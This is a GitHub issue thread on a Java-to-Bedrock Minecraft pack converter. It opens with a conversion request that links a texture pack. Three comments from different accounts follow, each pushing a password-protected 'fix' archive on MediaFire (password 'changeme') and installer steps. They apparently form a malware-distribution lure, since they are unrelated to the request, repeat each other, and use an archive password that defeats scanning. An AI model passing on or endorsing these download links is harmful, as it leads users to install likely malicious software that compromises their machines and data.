### ISSUE TITLE
[Pack]: catlegacy

### ISSUE THREAD

**Issue by Chiolo** [Kas-tle/java2bedrock.sh#33350]
### Java Pack Direct Download URL

https://www.dropbox.com/scl/fi/dmmrnk1adybmokuksske3/CatLegacyTexturePack.zip?rlkey=hwne387arqow6kwqlngypfccl&st=kvxjdaio&dl=1

### Default Assets Version

None

### Block Material

None

### Attachable Material

None

### Archive Scratch Files

None

### Rename Model Files

true

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by scppuna** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
